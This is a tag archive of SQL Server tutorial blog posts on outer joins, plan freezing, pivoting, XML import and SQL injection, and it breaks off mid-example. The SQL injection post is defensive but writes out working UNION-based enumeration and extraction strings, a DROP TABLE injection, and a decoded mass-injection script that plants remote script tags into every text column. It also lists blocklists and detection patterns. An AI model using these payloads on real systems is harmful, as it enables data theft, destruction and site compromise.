Tag Archive for: database

Outer Joins

Outer joins are one of the most widely misunderstood table operators. As useful as they are, it is very easy to incorrectly apply predicates in outer join queries and introduce logical bugs that are very difficult to troubleshoot (or spend hours trying to figure out why a particular query does not produce the desired results). This article demonstrates common misunderstanding about outer joins and how to properly use them.

First, let’s start with explanation of the logical processing of a query (listing here only the steps related to outer join operators, for full explanation of logical query processing read Anatomy of a Query).

1). FROM/CROSS JOIN: The FROM clause is processed to identify source tables; a cross join (Cartesian product) is formed between the two tables involved in the table operator.

2). ON: The ON clause predicates are applied and only rows that satisfy the predicate(s) (for which the predicates evaluate to TRUE) are included in the temporary result set.

3). ADD OUTER ROWS: The left side table in LEFT OUTER JOIN and right side table in RIGHT OUTER JOIN (or both tables in FULL OUTER JOIN) are the preserved tables. That means all rows (and selected attribute values) from this table(s) are present in the result set after the outer join operator is applied. At this phase the non-matching rows from the preserved table(s) are added back (non-matched based on the predicates in the ON clause). The attributes for the non-matched rows from the non-preserved table are added as NULLs.

4). WHERE: The predicates in the WHERE clause are applied and only rows for which the predicates evaluate to TRUE are included in the temporary result set.

The process repeats for any other table operators in the FROM clause taking the temporary result set from the prior table operator as left input.

The key concept here is to understand well phases 2, 3, and 4, and how filtering affects the result set. To illustrate this with example, let’s create two tables with loans and customers. Each customer can have personal or business loans (or both), or no loans at all.

CREATE TABLE Loans (

loan_nbr INT NOT NULL,

customer_nbr INT NOT NULL,

loan_date DATETIME NOT NULL,

loan_amount DECIMAL(15, 2) NOT NULL,

loan_type CHAR(1) NOT NULL,

CONSTRAINT ck_loan_type

CHECK (loan_type IN ('P', 'B')), -- P=Personal; B=Business

CONSTRAINT pk_loans

PRIMARY KEY (loan_nbr));






INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(1, 1, '20080101', 1500.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(2, 2, '20080215', 1000.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(3, 1, '20080311', 5000.00, 'B');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(4, 3, '20080312', 2000.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(5, 4, '20080325', 1200.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(6, 3, '20080327', 4000.00, 'B');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(7, 5, '20080410', 3500.00, 'B');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(8, 2, '20080412', 2000.00, 'P');




CREATE TABLE Customers (

customer_nbr INT NOT NULL,

customer_name VARCHAR(35),

PRIMARY KEY (customer_nbr));




INSERT INTO Customers (customer_nbr, customer_name)

VALUES(1, 'Peter Brown');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(2, 'Jeff Davis');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(3, 'Kevin Fox');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(4, 'Donna Louis');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(5, 'Greg Barrow');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(6, 'Richard Douglas');


-- Add foreign key for Loans

ALTER TABLE Loans

ADD CONSTRAINT fk_loans_customers

FOREIGN KEY (customer_nbr)

REFERENCES Customers(customer_nbr);

CASE #1: Predicates on the non-preserved table attributes

The first request is to retrieve list of all customers and only the total personal loan amount (if any) they have. The following query seems to describe the request properly:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

WHERE L.loan_type = 'P'

GROUP BY C.customer_name

ORDER BY customer_name;

However, the results do not seem correct:

customer_name    total

---------------- --------

Donna Louis 1200.00

Jeff Davis 3000.00

Kevin Fox 2000.00

Peter Brown 1500.00

Customers Greg and Richard are missing from the output. To understand the problems let’s run this step by step:

1). Cross join:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

CROSS JOIN Loans AS L;

This returns Cartesian product (every possible combination of a row from the Customers table and a row from the Loans table).

2). ON predicates:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

INNER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr;

This results in the following output:

customer_name   loan_amount  loan_type

--------------- ------------ ---------

Peter Brown 1500.00 P

Jeff Davis 1000.00 P

Peter Brown 5000.00 B

Kevin Fox 2000.00 P

Donna Louis 1200.00 P

Kevin Fox 4000.00 B

Greg Barrow 3500.00 B

Jeff Davis 2000.00 P

At this stage only rows that match based on the predicate for customer match are included.

3). Add outer rows:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr;

The query returns this result set:

customer_name   loan_amount   loan_type

--------------- ------------- ---------

Peter Brown 1500.00 P

Peter Brown 5000.00 B

Jeff Davis 1000.00 P

Jeff Davis 2000.00 P

Kevin Fox 2000.00 P

Kevin Fox 4000.00 B

Donna Louis 1200.00 P

Greg Barrow 3500.00 B

Richard Douglas
NULL NULL

Here the outer rows are added, resulting in adding back a row for customer Richard, who has no loans at all and was excluded in the prior phase when the ON clause predicates were applied.

4). WHERE predicates:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

WHERE L.loan_type = 'P';

This result set is the base for the results in the first query attempt:

customer_name   loan_amount  loan_type

--------------- ------------ ---------

Peter Brown 1500.00 P

Jeff Davis 1000.00 P

Kevin Fox 2000.00 P

Donna Louis 1200.00 P

Jeff Davis 2000.00 P

Now it is very clear that the predicate in the WHERE clause filters the NULL for loan type for customer Richard, and customer Greg is excluded because he has only business loans. Incorrectly placing the predicate in the WHERE clause turns the outer join to inner join.

To correct this query it only requires to move the predicate on loan type from the WHERE clause to the ON clause:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

AND L.loan_type = 'P'

GROUP BY C.customer_name

ORDER BY customer_name;

This results in correct result set listing all customers and the total personal loan amount.

customer_name    total

---------------- --------

Donna Louis 1200.00

Greg Barrow 0.00

Jeff Davis 3000.00

Kevin Fox 2000.00

Peter Brown 1500.00

Richard Douglas 0.00

CASE #2: Predicates on the preserved table attributes

Let’s look at another example demonstrating how filtering affect the preserved table attributes. The request is to retrieve the total loan amount for customer Richard Douglas, even if Richard does not have any loans at all. Since it is required to return always Richard’s account info, the following query seems to satisfy the request:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

AND C.customer_name = 'Richard Douglas'

GROUP BY C.customer_name

ORDER BY customer_name;

However, the result set returns information for all customers:

customer_name   total

--------------- -----

Donna Louis 0.00

Greg Barrow 0.00

Jeff Davis 0.00

Kevin Fox 0.00

Peter Brown 0.00

Richard Douglas 0.00

As explained earlier, the reason for that is that outer rows are added back after the outer join predicates are applied, resulting in adding back all other customers. To get only Richard’s loan information requires moving the predicate filtering on customer name to the WHERE clause:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

WHERE C.customer_name = 'Richard Douglas'

GROUP BY C.customer_name

ORDER BY customer_name;

This results in correctly returning only Richard’s loan information:

customer_name    total

---------------- -----

Richard Douglas 0.00

Plan Freezing

Plan freezing refers to forcing a plan for specific query. There are different reasons to freeze a plan, one is to provide plan stability for solving parameter sniffing issues.

This functionality was first introduced in SQL Server 2005 via using the USE PLAN query hint or using a plan guide to force a plan. However, using this feature was rather difficult with the requirement to capture the exact SQL statement. That was normally done using SQL Profiler trace or via querying the Dynamic Management Objects. Another issue was that changing the metadata (like dropping an index that affects the plan) resulted in error when trying to use the plan guide.

SQL Server 2008 added an array of enhancements. First, it simplified the mechanism to create a plan guide from plan handle via the sp_create_plan_guide_from_handle stored procedure. This eliminates the need to extract and match the SQL statement. Another enhancement is that if the metadata changes then the plan guide is silently skipped and the query execution continues with whatever execution plan is best.

Below is example of utilizing the new capabilities in SQL Server 2008 to freeze a plan.

-- Clear procedure cache

DBCC FREEPROCCACHE;





GO



-- First query run to get plan for freezing

SET STATISTICS XML ON;





EXEC sp_executesql   

N'SELECT orderid, customerid, orderdate, shippeddate

FROM Orders

WHERE customerid = N''CACYK'''
;

   

SET STATISTICS XML OFF;



GO



-- Create plan quide based on plan 

DECLARE @plan_handle VARBINARY(64);





SELECT @plan_handle plan_handle 

FROM sys.dm_exec_query_stats AS 

CROSS APPLY sys.dm_exec_sql_text(S.sql_handleAS T

WHERE text LIKE '%Order%';





EXEC sp_create_plan_guide_from_handle 'PlanGuide2008'@plan_handle @plan_handle;





GO





-- Check that plan guide was created

SELECT FROM sys.plan_guides;





GO



-- Execute and verify UsePlan="1" and PlanGuideName="PlanGuide2008" 

-- in the XML plan output 



SET STATISTICS XML ON;





EXEC sp_executesql   

N'SELECT orderid, customerid, orderdate, shippeddate

FROM Orders

WHERE customerid = N''CACYK'''
;        

   

SET STATISTICS XML OFF;





GO





EXEC sp_control_plan_guide N'DROP'N'PlanGuide2008'

SQL Injection

What is SQL Injection? Here is the definition from Wikipedia (http://en.wikipedia.org/wiki/SQL_injection):

“SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.”

Why another article on SQL Injection? Because no matter how much is written about it, developers still produce code that is susceptible to SQL injection attacks. The following is a dissection of a typical Web site vulnerable to SQL injection, with step by step example of what could happen, and protection methods.

Disclaimer: before even starting, it is important to emphasize – the solution to SQL injection is parameterization! Period! But… what if the client API does not support parameterization? Or the project is so large that changing all occurrences of bad code can result in massive code rewrite which may not be feasible at the moment? This is where some methods like string filtering fit in.

The example in this article uses the SQL Server sample database AdventureWorks (http://www.codeplex.com/SqlServerSamples).

Let’s start with a very trivial example of product search. The implementation is in C#:

string cmdStr @"SELECT Name, ProductNumber, Color

                  FROM Production.Product 

                  WHERE Name LIKE '%" 
SearchText.Text "%'";



using (SqlConnection conn = new SqlConnection(connStr))

using (SqlDataAdapter sda = new SqlDataAdapter(cmdStrconn))

{

DataTable dtProducts 
= new DataTable();



sda.Fill(dtProducts);



return dtProducts.DefaultView;

}

How simple and innocent! A couple lines of code and our search function is done. We simply let the user type any search criteria and create a dynamic query to search all products.

A good user may type “ball” in the search text box and get the following results:

Name                   ProductNumber    Color

-------------------    ---------------  -------

BB Ball Bearing        BE-2349    

Bearing Ball           BA
-8327  

Headset Ball Bearings  BE
-2908

But here comes someone who has not so good intentions. Instead of searching for “ball”, the bad guy may type:

ZZZ' UNION SELECT name, CAST(id AS VARCHAR(10)), '' FROM sysobjects WHERE xtype ='U' --

Clever! The guy noted on the original search that there are three columns returned and formed a query to union all user tables from the current database to the result set. First, the value ZZZ is added as search criteria, then the query to extract the user tables is injected, and finally the comment section at the end trims the reminder of the original query. Now the result looks as follows:

Name                ProductNumber     Color 

-----------------   ----------------  -------

Address             53575229   

AddressType         101575400   

AWBuildVersion      149575571   

BillOfMaterials     181575685   

Contact             309576141   

ContactCreditCard   405576483   

ContactType         437576597

Once the user tables are known, then next step could be the following search string:

ZZZ' UNION SELECT COLUMN_NAME, DATA_TYPE, TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Address' --

This time the search results return the columns information for the Address user table:

Name               ProductNumber     Color 

----------------   ----------------  --------

AddressID          int               Person 

AddressLine1       
nvarchar          Person 

AddressLine2       
nvarchar          Person 

City               
nvarchar          Person 

ModifiedDate       datetime          Person 

PostalCode         
nvarchar          Person 

rowguid            uniqueidentifier  Person 

StateProvinceID    
int               Person

Going one step further, the malicious user can start extracting data:

ZZZ' UNION SELECT AddressLine1, City, PostalCode FROM Person.Address --

This results in listing the address data from the Address table:

Name                            ProductNumber          Color 

-----------------------------   ---------------------  --------

#500-75 O'Connor Street         Ottawa                 K4B 1S2 

#9900 2700 Production Way       Burnaby                V5A 4X1 

00, rue Saint-Lazare            Dunkerque              59140 

02, place de Fontenoy           Verrieres Le Buisson   91370 

035, boulevard du Montparnasse  Verrieres Le Buisson   91370

So far the SQL injection attacker has been only exploring data. But things can get really unpleasant if the attacker starts updating or deleting data. Or even dropping tables. The following search text will drop a table with credit card info (if it exists):

ZZZ'; DROP TABLE CreditCardInfo --

All this should convince every developer that SQL injection is a very serious threat that should not be taken lightly.

Solutions

Handling SQL injection can be done both on the client and the server side. The following techniques will demonstrate how to accomplish that.

Client Side Filtering

The client APIs normally provide a variety of methods to filter the user input. It could include using regular expressions, limiting the size of the search arguments, filtering for dangerous keywords, etc. Here is example of creating a black list of keywords that will be filtered from the user input:

public static string[] blackList 

       
{"--",";--",";","/*","*/","@@","@",

        
"char","nchar","varchar","nvarchar",

        
"alter","begin","cast","create","cursor",

        
"declare","delete","drop","end","exec","execute",

        
"fetch","insert","kill","open",

        
"select""sys","sysobjects","syscolumns",

        
"table","update"};



private bool CheckInput(string SearchText)

{

for (int 0blackList.Lengthi++)

      
{

if ((SearchText.IndexOf(blackList[i]

                 
StringComparison.OrdinalIgnoreCase) >= 0))

{

HttpContext.Current.Response.Redirect
("~/Error.aspx");  

return false;

}

}

return true;

}

The CheckInput function verifies the user input for any of the words on the black list and if found redirects to an error page. Then the search function looks like this:

string cmdStr @"SELECT Name, ProductNumber, Color

                  FROM Production.Product 

                  WHERE Name LIKE '%" 
SearchText.Text "%'";



if(CheckInput(SearchText.Text))

{

using (SqlConnection conn = new SqlConnection(connStr))

using (SqlDataAdapter sda = new SqlDataAdapter(cmdStrconn))

{

DataTable dtProducts 
= new DataTable();



sda.Fill(dtProducts);



return dtProducts.DefaultView;

}

}

else

{

DataTable dtProducts 
= new DataTable();

return dtProducts.DefaultView;

}

Parameterization

Most client APIs (including .NET) support parameterization of queries. This allows embedding the user input as parameters. The parameters are placeholders for user entered value which is replaced at execution time. That way the user cannot inject SQL code as the whole user entry is treated as value for the parameter, not as string appended to the query. Again, parameterization is the best solution for SQL injection attacks.

Here is how the same search code will look like with parameterized query (for simplicity here we use a query, but this could be a stored procedure):

string cmdStr @"SELECT Name, ProductNumber, Color

                  FROM Production.Product 

                  WHERE Name LIKE '%' + @SearchText + '%'"
;



using (SqlConnection conn = new SqlConnection(connStr))

using (SqlDataAdapter sda = new SqlDataAdapter(cmdStrconn))

{

DataTable dtProducts 
= new DataTable();



SqlParameter parm sda.SelectCommand.Parameters.Add("@SearchText",

                          
SqlDbType.VarChar50);

parm.Value SearchText.Text;



sda.Fill(dtProducts);



return dtProducts.DefaultView;

}

Attempts to enter the same malicious search text will result in to output as there is no product with such name.

Server Side Filtering

Filtering can be implemented on the server side, very similar to the client side black list. Here is a fragment of code that can be added to be beginning of stored procedures to verify the search string entered by the user:

IF   UPPER(@SearchText) LIKE UPPER(N'%0x%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%;%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%''%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%--%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%/*%*/%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%EXEC %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%xp[_]%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%sp[_]%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%SELECT %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%INSERT %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%UPDATE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%DELETE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%TRUNCATE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%CREATE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%ALTER %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%DROP %')

BEGIN

  RAISERROR
('Possible SQL Injection attempt.'161);

  
RETURN;

END

Of course, ultimately the search can be implemented as stored procedure using a parameter, and without dynamic SQL:

CREATE PROCEDURE ProductSearch

 
@SearchText VARCHAR(200)

AS

 SELECT 
NameProductNumberColor 

 
FROM Production.Product 

 
WHERE Name LIKE '%' @SearchText '%';

Secondary Injection Attacks

Recently there has been a new wave of SQL injection attacks. Those utilize a delayed action technique. The way to exploit the web site is the same – looking for any non-parameterized and non-filtered queries and injection a portion of code that will be executed by SQL Server. However, in this attack the code simply loops through all user tables and inserts some HTML or JavaScript code to all string columns. This has dual effect – you data is no longer what you think it is, and then if this data is used to be displayed on a Web page then the HTML or JavaScript code will become part of your Web page.

Here are the steps to illustrate this. Normally attackers search for URLs that pass user input directly via an URL query string. That makes is very easy to inject SQL code as part of the URL. It could look like this (abbreviated):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300...7200%20AS%20NVARCHAR(4000));EXEC(@S);--

After the encoding is removed and the string is passed to SQL Server, it looks like this:

DECLARE @S NVARCHAR(4000); 

SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000)); 

EXEC(@S);--

Decoding the hex value reveals the actual SQL code that will be executed:

DECLARE @T varchar(255),@C varchar(255

DECLARE Table_Cursor CURSOR FOR 

select 
a.name,b.name from sysobjects a,syscolumns b 

where a.id=b.id and a.xtype='u' and 

(
b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C 

WHILE(@@FETCH_STATUS=0BEGIN 

exec
('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+

']))+''<script src=http://www.211796*.net/f****p.js></script>'''

FETCH NEXT FROM  Table_Cursor INTO @T,@C 

END 

CLOSE 
Table_Cursor 

DEALLOCATE Table_Cursor

In short, the script loops though all tables in the database and looks for string columns, and then appends the HTML or JavaScript code.

One very unpleasant effect of this attack is that normally pages with such content are treated by major search engines as treats, and are very likely to me considered malicious and removed from indexes.

The same techniques described earlier can be used to prevent secondary SQL injection attacks.

Tools

Here are some tools that can be used to help with SQL Injection attacks:

– Microsoft Source Code Analyzer for SQL Injection
New static analysis tool that identifies SQL injection vulnerabilities in ASP source code and suggests fixes. Enables customers to address the vulnerability at the source.
http://support.microsoft.com/kb/954476

– URLScan 3.0
Updated version of the IIS tool that acts as a site filter by blocking specific HTTP requests. Can be used to block malicious requests used in this attack.
http://learn.iis.net/page.aspx/473/using-urlscan

– Scrawlr
New scanning tool from Hewlett Packard that scans websites looking for SQL injection vulnerabilities in URL parameters. http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/24/finding-sql-injection-with-scrawlr.aspx

– SQLInjectionFinder
Tool to help determine .asp pages targeted by recent SQL Injection attacks.
http://www.codeplex.com/Release/ProjectReleases.aspx?ProjectName=WSUS&ReleaseId=13436

Unpivoting Multiple Columns

Unpivoting is the process of normalizing data. In earlier post I discussed unpivoting a single column. This demonstration is to show how to unpivot multiple columns.

The task is to normalize the following denormalized data, which represents product sales volumes by quarter:

product_nbr qtr1   sales_qtr1  qtr2   sales_qtr2  qtr3   sales_qtr3  qtr4   sales_qtr4

----------- ------ ----------- ------ ----------- ------ ----------- ------ -----------

1           2008Q1 100         2008Q2 20          2008Q3 15          2008Q4 10

2           2008Q1 80          2008Q2 15          2008Q3 20          2008Q4 10

3           2008Q1 70          2008Q2 5           2008Q3 10          2008Q4 15

Normalized data set should look like this:

product_nbr qtr    sales

----------- ------ -----------

1           2008Q1 100

1           2008Q2 20

1           2008Q3 15

1           2008Q4 10

2           2008Q1 80

2           2008Q2 15

2           2008Q3 20

2           2008Q4 10

3           2008Q1 70

3           2008Q2 5

3           2008Q3 10

3           2008Q4 15

The first method uses CROSS JOIN with table with numbers (needs one number for each quarter) and CASE expressions to select the appropriate value (quarter or sales volume) for each quarter.

SELECT product_nbr

       
CASE n

            
WHEN THEN qtr1

            
WHEN THEN qtr2

            
WHEN THEN qtr3

            
WHEN THEN qtr4

       
END AS qtr,

       
CASE n

            
WHEN THEN sales_qtr1

            
WHEN THEN sales_qtr2

            
WHEN THEN sales_qtr3

            
WHEN THEN sales_qtr4

       
END AS sales

FROM QuarterlySales AS S

CROSS JOIN 

(SELECT UNION 

 SELECT 
UNION

 SELECT 
UNION

 SELECT 
4AS Nums(n);

Alsmost seems natural that we should be able to do the same much easier using the UNPIVOT operator (introduced in SQL Server 2005). However, one of the limitations of the UNPIVOT operator is that it works only with a single column. But because SQL Server allows multiple table operators in the FROM clause, we can use two UNPIVOT operators. The catch is that the second UNPIVOT operator applies to the virtual table results from the first unpivot operator. That requires using a little trick to extract and match the quarter from the results of each UNPIVOT operator in order to produce the final result. Here is the query to unpivot using the UNPIVOT operator.

SELECT product_nbrqtrsales

FROM 

 
(SELECT product_nbr

         
qtr1sales_qtr1

         
qtr2sales_qtr2

         
qtr3sales_qtr3,

         
qtr4sales_qtr4

  
FROM QuarterlySalesAS S

UNPIVOT

 (qtr FOR qtrx IN (qtr1qtr2qtr3qtr4)) AS U1

UNPIVOT

 (sales FOR sales_qtrx IN (sales_qtr1sales_qtr2

                           
sales_qtr3sales_qtr4)) AS U2

WHERE RIGHT(sales_qtrx1RIGHT(qtrx1);

Pivoting on Multiple Columns

Pivoting data on more than one column is not a common request. But there are times when it is a very useful technique for reporting purposes. Here is one example to demonstrate different methods to handle that.

The goal is to report product data by pivoting columns with value and quantity for each product based on year. Here is the script to create the table and insert sample data.

CREATE TABLE Products (

product VARCHAR(30),

market_year INT,

value INT,

quantity INT,

CONSTRAINT pk_products

PRIMARY KEY (product, market_year));
INSERT INTO Products VALUES('Corn', 2003, 100, 20);
INSERT INTO Products VALUES('Corn', 2004, 200, 25);

INSERT INTO Products VALUES('Corn', 2005, 150, 30);

INSERT INTO Products VALUES('Corn', 2006, 150, 10);

The request is to produce the following output:

product v2003 q2003 v2004 q2004 v2005 q2005 v2006 q2006

------- ----- ----- ----- ----- ----- ----- ----- -----

Corn 100 20 200 25 150 30 150 10

As usual, the first suspect for pivoting solution is the CASE function. Using CASE expressions is the most flexible method to manipulate data for pivoting. There is not much difference when pivoting a single or multiple columns. Here is the solution with CASE:

SELECT product,

SUM(CASE WHEN market_year = 2003 THEN value ELSE 0 END) AS v2003,

SUM(CASE WHEN market_year = 2003 THEN quantity ELSE 0 END) AS q2003,

SUM(CASE WHEN market_year = 2004 THEN value ELSE 0 END) AS v2004,

SUM(CASE WHEN market_year = 2004 THEN quantity ELSE 0 END) AS q2004,

SUM(CASE WHEN market_year = 2005 THEN value ELSE 0 END) AS v2005,

SUM(CASE WHEN market_year = 2005 THEN quantity ELSE 0 END) AS q2005,

SUM(CASE WHEN market_year = 2006 THEN value ELSE 0 END) AS v2006,

SUM(CASE WHEN market_year = 2006 THEN quantity ELSE 0 END) AS q2006

FROM Products

GROUP BY product;

Next, let's look at the PIVOT operator that was added in SQL Server 2005. The PIVOT operator has a few limitations, and one of them is that it supports pivoting only on a single column. However, T-SQL allows to specify multiple PIVOT operators in the FROM clause, that way providing a solution for pivoting on multiple columns. There is one catch: the second PIVOT consumes the temporary result set output of the first PIVOT operator. Because of that the year column is not available (since it is used as pivoting column in the first PIVOT) and there is a need to define a virtual column that replicates the values for the year. Also, since the first PIVOT operator uses the year values as column names, the new virtual column subtracts 2000 from the year value to generate different column names for the second PIVOT operator. Here is the query using two PIVOT operators:

SELECT product,

MAX([2003]) AS v2003,

MAX([3]) AS q2003,

MAX([2004]) AS v2004,

MAX([4]) AS q2004,

MAX([2005]) AS v2005,

MAX([5]) AS q2005,

MAX([2006]) AS v2006,

MAX([6]) AS q2006

FROM (SELECT product, market_year,

market_year - 2000 AS market_year2,

SUM(value) AS value,

SUM(quantity) AS quantity

FROM Products

GROUP BY product, market_year) AS T

PIVOT

(SUM(value) FOR market_year IN

([2003], [2004], [2005], [2006])) AS P1

PIVOT

(SUM(quantity) FOR market_year2 IN

([3], [4], [5], [6])) AS P2

GROUP BY product;

In this particular case there is more elegant solution using a single PIVOT operator. With little math the value and the quantity can be combined into single column and then after the pivoting split back to two separate columns. Here is the solution using a single PIVOT operator:

SELECT product,

[2003] / 1000 AS v2003,

[2003] % 1000 AS q2003,

[2004] / 1000 AS v2004,

[2004] % 1000 AS q2004,

[2005] / 1000 AS v2005,

[2005] % 1000 AS q2005,

[2006] / 1000 AS v2006,

[2006] % 1000 AS q2006

FROM (SELECT product, market_year,

value * 1000 + quantity AS value

FROM Products) AS T

PIVOT

(SUM(value) FOR market_year IN

([2003], [2004], [2005], [2006])) AS P;

Dynamic Pivoting

SQL Server 2005 added the PIVOT operator which makes creating cross-tab queries very easy. However, as of this writing none of the SQL Server versions has built-in support for dynamic pivoting. The PIVOT operator only provides basic pivoting capabilities on a static list of values. In practice it is very often needed to perform this for dynamic list of values.

Here is one solution for dynamic pivoting that uses the ability in SQL Server 2005/2008 to concatenate row values using FOR XML PATH with blank element name. This method performs a query on the distinct values to pivot and creates a column list based on that. Then the resulting column list is used in a dynamic query utilizing the PIVOT operator and executed as dynamic SQL.

In this scenario the goal is to pivot order amounts by month.

-- Table with orders

CREATE TABLE Orders (

  order_id INT NOT NULL PRIMARY KEY,

  order_date DATETIME NOT NULL

            DEFAULT CURRENT_TIMESTAMP,

  amount DECIMAL(8, 2) NOT NULL DEFAULT 0

        CHECK (amount >= 0));

 

-- Sample data

INSERT INTO Orders

(order_id, order_date, amount)

SELECT 1, '20070101', 10.50

UNION ALL

SELECT 2, '20070126', 12.50

UNION ALL

SELECT 3, '20070130', 12.00

UNION ALL

SELECT 4, '20070214', 13.75

UNION ALL

SELECT 5, '20070220', 10.00

UNION ALL

SELECT 6, '20070306', 15.00

UNION ALL

SELECT 7, '20070310', 17.50

UNION ALL

SELECT 8, '20070329', 20.00;

 

-- Build list of column values to pivot

DECLARE @cols NVARCHAR(1000);

SELECT @cols =

STUFF((SELECT N'],[' + year_month

       FROM (SELECT DISTINCT CONVERT(NCHAR(7), order_date, 126)

            FROM Orders) AS O(year_month)

       ORDER BY year_month

       FOR XML PATH('')

      ), 1, 2, '') + N']';

 

-- Build dynamic SQL query for pivoting  

DECLARE @sql NVARCHAR(2000);

SET @sql =

N'SELECT order_year, ' + @cols +

N'FROM (SELECT DATEPART(yyyy, order_date) AS order_year, ' +

            N'CONVERT(NCHAR(7), order_date, 126) AS year_month, ' +

            N'amount ' +

      N'FROM Orders) AS O ' +

N'PIVOT ' +

N'(SUM(amount) FOR year_month IN (' + @cols + N')) AS P;';

 

EXEC(@sql);

 

/*

 

Results:

 

order_year 2007-01 2007-02 2007-03

----------- -------- -------- --------

2007        35.00    23.75    52.50

 

*/

This query can be further improved by using the QUOTENAME function to prevent any possibility of SQL injection.

Import XML File to SQL Table

Here is a brief example of importing an XML file into SQL Server table. This is accomplished by using the BULK option of OPENROWSET to load the file, and then utilizing the XQuery capabilities of SQL Server to parse the XML to normalized table format. This example requires SQL server 2005 or SQL Server 2008.

First, the following XML is saved to XML file C:Products.xml.

<Products>

  <Product>

    <SKU>1</SKU>

    <Desc>Book</Desc>

  </Product>

  <Product>

    <SKU>2</SKU>

    <Desc>DVD</Desc>

  </Product>

  <Product>

    <SKU>3</SKU>

    <Desc>Video</Desc>

  </Product>

</Products>

Next, a table named Products is created to store the XML data.

CREATE TABLE Products(

 sku INT PRIMARY KEY,

 product_desc VARCHAR(30));

Finally, the following statement will load the XML file, parse the XML elements to columns, and insert into the Products table:

INSERT INTO Products (sku, product_desc)

SELECT X.product.query('SKU').value('.', 'INT'),

       X.product.query('Desc').value('.', 'VARCHAR(30)')

FROM (

SELECT CAST(x AS XML)

FROM OPENROWSET(

    BULK 'C:Products.xml',

    SINGLE_BLOB) AS T(x)

    ) AS T(x)

CROSS APPLY x.nodes('Products/Product') AS X(product);

Here are the results:

SELECT sku, product_desc

FROM Products;

 

/*

 

Results:

 

sku         product_desc

----------- -------------

1           Book

2           DVD

3           Video

 

*/

Top N by Group

It is a very common request to select the top N items per group. Examples are the top 2 sales agents per region, the last two orders per customer, etc. There are various techniques to accomplish this. On SQL Server 2005 and 2008 this normally involves CROSS APPLY, TOP, and the ranking functions.

Here are a couple examples of solving this problem utilizing the ranking functions in SQL Server 2005/2008. These methods are very simple and efficient, at the same time providing flexibility to manage ties.

CREATE TABLE Loans (

  loan_nbr INT NOT NULL PRIMARY KEY,

  loan_date DATETIME NOT NULL,

  loan_amount DECIMAL(12, 2) NOT NULL

              DEFAULT 0.0,

  customer_nbr INT NOT NULL,

  loan_type CHAR(1) NOT NULL

            DEFAULT 'P'

            CHECK (loan_type IN ('P'-- personal

                                'B')) -- business

  );

 

INSERT INTO Loans

VALUES (1, '20080801', 12000.00, 2, 'P'),

       (2, '20080805', 15700.00, 1, 'B'),

       (3, '20080610', 12000.00, 3, 'P'),

       (4, '20080401', 5000.00, 1, 'P'),

       (5, '20080715', 25000.00, 4, 'B'),

       (6, '20080610', 25000.00, 5, 'P'),

       (7, '20080501', 1000.00, 6, 'P'),

       (8, '20080810', 6000.00, 7, 'B'),

       (9, '20080815', 2000.00, 8, 'B'),

